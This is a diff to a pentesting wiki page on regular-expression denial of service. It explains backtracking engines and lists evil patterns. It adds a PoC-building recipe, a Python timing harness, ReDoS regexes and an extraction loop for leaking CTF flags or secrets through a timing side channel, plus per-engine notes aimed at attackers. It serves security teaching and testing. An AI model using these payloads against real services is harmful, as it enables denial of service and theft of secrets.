File: src/pentesting-web/regular-expression-denial-of-service-redos.md (55 additions & 8 deletions)
@@ -8,7 +8,12 @@ A **Regular Expression Denial of Service (ReDoS)** happens when someone takes ad
## The Problematic Regex Naïve Algorithm
**Check the details in [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)**
### Engine behavior and exploitability
- Most popular engines (PCRE, Java `java.util.regex`, Python `re`, JavaScript `RegExp`) use a **backtracking** VM. Crafted inputs that create many overlapping ways to match a subpattern force exponential or high-polynomial backtracking.
- Some engines/libraries are designed to be **ReDoS-resilient** by construction (no backtracking), e.g. **RE2** and ports based on finite automata that provide worst‑case linear time; using them for untrusted input removes the backtracking DoS primitive. See the references at the end for details.
@@ -18,10 +23,36 @@ An evil regular expression pattern is that one that can **get stuck on crafted i
- ([a-zA-Z]+)\*
- (a|aa)+
- (a|a?)+
- (.*a){x} for x > 10

All those are vulnerable to the input `aaaaaaaaaaaaaaaaaaaaaaaa!`.
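To make the blow-up concrete, the sketch below models how a naive backtracker explores `(a|aa)+` when the input is a run of `a` followed by a character that can never match. It is a toy model written for illustration, not the algorithm of any particular engine, and `backtrack_steps` is a hypothetical helper that only counts explored positions.

```python
def backtrack_steps(n: int) -> int:
    """Count positions a naive backtracker visits for (a|aa)+ on 'a' * n + '!'.

    Assumption: the trailing '!' makes the overall match fail, so every
    way of splitting the run into 'a' and 'aa' pieces is tried.
    """
    steps = 0

    def try_from(pos: int) -> bool:
        nonlocal steps
        steps += 1
        # Try the alternative `a` (width 1), then `aa` (width 2).
        for width in (1, 2):
            if pos + width <= n and try_from(pos + width):
                return True
        # Nothing after the run can match, so this branch fails.
        return False

    try_from(0)
    return steps


if __name__ == "__main__":
    for n in (5, 10, 15, 20, 25):
        print(n, backtrack_steps(n))
```

In this model the count follows a Fibonacci-like recurrence (`steps(n) = 1 + steps(n-1) + steps(n-2)`), so every extra `a` multiplies the work by roughly 1.6.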
### Practical recipe to build PoCs
Most catastrophic cases follow this shape:
- Prefix that gets you into the vulnerable subpattern (optional).
- Long run of a character that causes ambiguous matches inside nested/overlapping quantifiers (e.g., many `a`, `_`, or spaces).
- A final character that forces overall failure so the engine must backtrack through all possibilities (often a character that won’t match the last token, like `!`).

Minimal examples:
- `(a+)+$` vs input `"a"*N + "!"`
- `\w*_*\w*$` vs input `"v" + "_"*N + "!"`

Increase N and watch the match time grow super‑linearly.
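The prefix / pump / failing-tail shape described above can be captured in a small generator. This is a minimal sketch; `build_poc` and `doubling_inputs` are hypothetical helper names introduced here, and the default `!` tail assumes that character cannot match the last token of the target pattern.

```python
from typing import Iterator, Tuple


def build_poc(pump: str, n: int, prefix: str = "", suffix: str = "!") -> str:
    """Return prefix + pump repeated n times + a tail meant to force failure."""
    return prefix + pump * n + suffix


def doubling_inputs(
    pump: str, k_min: int, k_max: int, prefix: str = "", suffix: str = "!"
) -> Iterator[Tuple[int, str]]:
    """Yield (n, payload) pairs with n = 2**k for k_min <= k <= k_max."""
    for k in range(k_min, k_max + 1):
        n = 2 ** k
        yield n, build_poc(pump, n, prefix, suffix)


if __name__ == "__main__":
    # Payloads for the second minimal example: "v" + "_" * N + "!"
    for n, payload in doubling_inputs("_", 3, 5, prefix="v"):
        print(n, payload)
```

Keeping the payload builder separate from the timing loop makes it easy to reuse the same inputs against different patterns or targets.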
#### Quick timing harness (Python)
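```python
import re
import time

# \w also matches "_", so the run of underscores can be split in many ways.
pat = re.compile(r'(\w*_)\w*$')

for n in [2**k for k in range(8, 15)]:
    s = 'v' + '_' * n + '!'  # the trailing "!" forces the overall match to fail
    t0 = time.perf_counter()
    pat.search(s)
    dt = time.perf_counter() - t0
    print(n, f"{dt:.3f}s")  # later iterations may be slow; interrupt once the trend is clear
```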
## ReDoS Payloads
### String Exfiltration via ReDoS
@@ -30,7 +61,7 @@ In a CTF (or bug bounty) maybe you **control the Regex a sensitive information (
- In [**this post**](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) you can find this ReDoS rule: `^(?=<flag>)((.*)*)*salt$`
- Example: `^(?=HTB{sOmE_fl§N§)((.*)*)*salt$`
- In [**this writeup**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html) you can find this one: `<flag>(((((((.*)*)*)*)*)*)*)!`
- In [**this writeup**](https://ctftime.org/writeup/25869) the author used: `^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$`
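The rules above all work the same way: the lookahead only lets the expensive part run when the guessed prefix is correct, so a slow response confirms the guess. A minimal sketch of the resulting extraction loop follows. `build_pattern`, `extract_secret` and the `is_slow` callback are hypothetical names; in a real attack `is_slow` would send the pattern to the target and compare the latency against a baseline, whereas here it is simulated locally.

```python
import re
from typing import Callable

# Catastrophic tail taken from the first rule listed above.
TAIL = ")((.*)*)*salt$"


def build_pattern(prefix: str) -> str:
    """Build ^(?=<prefix>)((.*)*)*salt$ with the guessed prefix escaped."""
    return "^(?=" + re.escape(prefix) + TAIL


def extract_secret(
    is_slow: Callable[[str], bool], known: str, charset: str, max_len: int = 64
) -> str:
    """Extend `known` one character at a time while some guess is slow."""
    while len(known) < max_len:
        for ch in charset:
            if is_slow(build_pattern(known + ch)):
                known += ch
                break
        else:
            # No candidate triggered the slow path: assume the secret is complete.
            break
    return known


if __name__ == "__main__":
    secret = "HTB{r3d0s}"  # stand-in value for the local simulation only

    def simulated_oracle(pattern: str) -> bool:
        # Assumption: the slow path is hit exactly when the lookahead matches.
        guessed = pattern[len("^(?="):-len(TAIL)]
        return re.match(guessed, secret) is not None

    charset = "abcdefghijklmnopqrstuvwxyz0123456789_}"
    print(extract_secret(simulated_oracle, "HTB{", charset))
```

Against a real target the oracle is noisy, so repeating each measurement and comparing against a known-wrong guess is usually needed before accepting a character.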
### ReDoS Controlling Input and Regex
@@ -67,19 +98,35 @@ Regexp (a+)*$ took 723 milliseconds.
*/
```
### Language/engine notes for attackers
- JavaScript (browser/Node): Built‑in `RegExp` is a backtracking engine and commonly exploitable when regex+input are attacker‑influenced.
- Python: `re` is backtracking. Long ambiguous runs plus a failing tail often yield catastrophic backtracking.
- Java: `java.util.regex` is backtracking. If you only control input, look for endpoints using complex validators; if you control patterns (e.g., stored rules), ReDoS is usually trivial.
- Engines such as **RE2/RE2J/RE2JS** or the **Rust regex** crate are designed to avoid catastrophic backtracking. If you hit these, focus on other bottlenecks (e.g., enormous patterns) or find components still using backtracking engines.
- End‑to‑end pipeline to extract regexes from a project, detect vulnerable ones, and validate PoCs in the target language. Useful for hunting through large codebases.
- Simple CLI/JS library that reasons about backtracking to report if a pattern is safe.
> Tip: When you only control input, generate strings with doubling lengths (e.g., 2^k characters) and track latency. Exponential growth strongly indicates a viable ReDoS.
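One way to read the latencies collected with doubling lengths is to estimate the local growth exponent between consecutive samples. The sketch below is an assumption-laden helper (`growth_exponents` is a hypothetical name): values near 1 suggest linear behavior, values near 2 or 3 suggest polynomial backtracking, and values that keep climbing from step to step are consistent with exponential growth.

```python
import math
from typing import List, Sequence, Tuple


def growth_exponents(samples: Sequence[Tuple[int, float]]) -> List[float]:
    """Estimate d in t ~ n**d between consecutive (n, seconds) samples.

    Pairs with a non-positive timing are skipped because the logarithm
    is undefined for them (e.g. measurements below timer resolution).
    """
    exponents = []
    for (n0, t0), (n1, t1) in zip(samples, samples[1:]):
        if t0 <= 0 or t1 <= 0 or n0 <= 0 or n1 == n0:
            continue
        exponents.append(math.log(t1 / t0) / math.log(n1 / n0))
    return exponents


if __name__ == "__main__":
    # Synthetic timings for illustration only, not measurements.
    measured = [(256, 0.01), (512, 0.04), (1024, 0.16)]
    print(growth_exponents(measured))
```

Network jitter can dominate small timings, so it helps to take the median of several requests per length before feeding the samples in.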
- SoK (2024): A Literature and Engineering Review of Regular Expression Denial of Service (ReDoS) — [https://arxiv.org/abs/2406.11618](https://arxiv.org/abs/2406.11618)